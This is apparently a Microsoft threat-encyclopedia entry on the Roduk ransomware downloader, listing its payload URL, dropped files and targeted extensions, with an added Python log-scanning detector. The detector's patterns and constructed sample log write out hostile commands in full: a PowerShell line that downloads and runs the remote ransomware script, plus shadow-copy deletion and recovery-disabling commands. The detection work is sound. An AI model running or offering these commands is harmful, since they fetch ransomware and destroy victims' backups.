TrojanDownloader:PowerShell/Roduk.A
First posted on 04 June 2015.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:PowerShell/Roduk.A.
Explanation:
Threat behavior
Installation
This threat is a detection for one of the PowerShell file components of Ransom:Powershell/Roduk. The component downloads Ransom:Powershell/Roduk over HTTP from the following URL and runs it:
- http://193.230.220.38/wall/encrypt.ps1
It can create the following files on your PC:
- c:\1\locked.bmp - ransom wallpaper image
- c:\1\reflect.dll - detected as Ransom:Win32/Roduk.A!dll
- c:\1\t.dll - detected as Ransom:Win32/Roduk.A!dll
- %desktop%\encrypted.htm - list of encrypted files
- %desktop%\qwer.html - ransom html page
- %desktop%\qwer2.html - ransom html page
Payload
Encrypts your files
This threat can search your PC for any files with the following extensions:
- .ai
- .crt
- .csv
- .db
- .doc
- .docm
- .docx
- .dotx
- .gif
- .jpeg
- .jpg
- .lnk
- .mp3
- .msi
- .ods
- .one
- .ost
- .p12
- .pem
- .pps
- .ppsx
- .ppt
- .pptx
- .psd
- .pst
- .pub
- .rar
- .raw
- .rtf
- .tif
- .txt
- .vsdx
- .wma
- .xls
- .xlsm
- .xlsx
- .xml
- .zip
It encrypts any files that it finds and displays the following messages:
Deletes backup files
This threat also tries to stop you from restoring your files from backup. It does this by:
- Deleting Volume Shadow Copy snapshots ("shadow files") to prevent you from restoring your files from a local backup
- Disabling Startup Repair and Windows Error Recovery on system startup
- Disabling System Restore
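The installation, payload and backup-deletion behavior described above can be turned into a log-based detection. The Python script below is an added example for this page; it is not Microsoft's detection logic and not code from the sample. It scans process-creation and file-creation log lines for the downloader URL and the dropped-file paths listed on this page, and for command patterns matching shadow-copy deletion and the disabling of Startup Repair, Windows Error Recovery and System Restore. Those command patterns (vssadmin, bcdedit, a reg write of DisableSR), the PowerShell download command line and the sample log lines are assumptions: the page does not quote the commands the threat runs.

```python
"""Flag TrojanDownloader:PowerShell/Roduk.A / Ransom:Powershell/Roduk activity
in process-creation and file-creation log lines.

Added example for this page; not Microsoft's detection logic and not code
from the malware. The downloader URL and the dropped-file paths come from the
page. The vssadmin/bcdedit/reg command patterns are an ASSUMPTION: the page
only says the threat deletes shadow copies and disables Startup Repair,
Windows Error Recovery and System Restore; these are the commands commonly
used for that, not commands quoted from the sample.
"""
import re

# From the page: the URL the downloader fetches over HTTP and runs.
DOWNLOAD_URL = "http://193.230.220.38/wall/encrypt.ps1"

# From the page: files the threat creates. %desktop% is the user's Desktop folder.
DROPPED_FILES = [
    r"c:\1\locked.bmp",
    r"c:\1\reflect.dll",
    r"c:\1\t.dll",
    r"%desktop%\encrypted.htm",
    r"%desktop%\qwer.html",
    r"%desktop%\qwer2.html",
]

# ASSUMED command patterns for the backup-destruction behaviour the page describes.
BACKUP_DESTRUCTION = {
    "shadow_copy_deletion":
        re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "startup_repair_disabled":
        re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
    "error_recovery_disabled":
        re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
    "system_restore_disabled":
        re.compile(r"Disable-ComputerRestore|SystemRestore.*\bDisableSR\b", re.I),
}


def _file_pattern(path):
    """Regex for one dropped-file path; %desktop% matches any user's Desktop folder."""
    prefix = "%desktop%\\"
    if path.lower().startswith(prefix):
        return re.compile(r"\\Desktop\\" + re.escape(path[len(prefix):]) + r"(?![\w.])", re.I)
    return re.compile(r"(?<![\w.])" + re.escape(path) + r"(?![\w.])", re.I)


DROPPED_FILE_PATTERNS = [(p, _file_pattern(p)) for p in DROPPED_FILES]


def scan_line(line):
    """Return the indicator names that one log line matches (empty list if clean)."""
    hits = []
    if DOWNLOAD_URL.lower() in line.lower():
        hits.append("roduk_downloader_url")
    for name, pattern in BACKUP_DESTRUCTION.items():
        if pattern.search(line):
            hits.append(name)
    for path, pattern in DROPPED_FILE_PATTERNS:
        if pattern.search(line):
            hits.append("dropped_file:" + path)
    return hits


def scan_log(lines):
    """Map each matched indicator to the 1-based numbers of the lines that hit it."""
    findings = {}
    for number, line in enumerate(lines, 1):
        for hit in scan_line(line):
            findings.setdefault(hit, []).append(number)
    return findings


def assess(findings):
    """Rough triage verdict: 'infected' when the downloader ran and backups were
    attacked, 'suspicious' when any single indicator fired, else 'clean'."""
    if not findings:
        return "clean"
    backup_hit = any(name in findings for name in BACKUP_DESTRUCTION)
    if "roduk_downloader_url" in findings and backup_hit:
        return "infected"
    return "suspicious"


# Constructed sample log (Sysmon-style key=value lines); not a real capture.
SAMPLE_LOG = [
    'CommandLine="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)'
    '.DownloadString(\'http://193.230.220.38/wall/encrypt.ps1\')"',
    'CommandLine="vssadmin.exe delete shadows /all /quiet"',
    'CommandLine="bcdedit.exe /set {default} recoveryenabled No"',
    'CommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"',
    'CommandLine="reg.exe add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore" '
    '/v DisableSR /t REG_DWORD /d 1 /f"',
    'TargetFilename="C:\\1\\locked.bmp"',
    'TargetFilename="C:\\Users\\alice\\Desktop\\qwer.html"',
    'CommandLine="notepad.exe C:\\Users\\alice\\notes.txt"',
]

if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for indicator, numbers in result.items():
        print(f"{indicator}: lines {numbers}")
    print("verdict:", assess(result))
```

Feed real Sysmon or EDR command-line and file-creation events into scan_log in place of SAMPLE_LOG. The file-path indicators are the weakest part of the rule (a different build can drop files elsewhere), so the assess() verdict gives most weight to the combination of the download and the backup-destruction commands, which is the part of this behavior that other ransomware families share.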
Analysis by Jireh Sanico
Symptoms
The following can indicate that you have this threat on your PC:
- You have these files:
- c:\1\locked.bmp - ransom wallpaper image
- c:\1\reflect.dll - detected as Ransom:Win32/Roduk.A!dll
- c:\1\t.dll - detected as Ransom:Win32/Roduk.A!dll
- %desktop%\encrypted.htm - list of encrypted files
- %desktop%\qwer.html - ransom html page
- %desktop%\qwer2.html - ransom html page
- You see these messages:
Last update 04 June 2015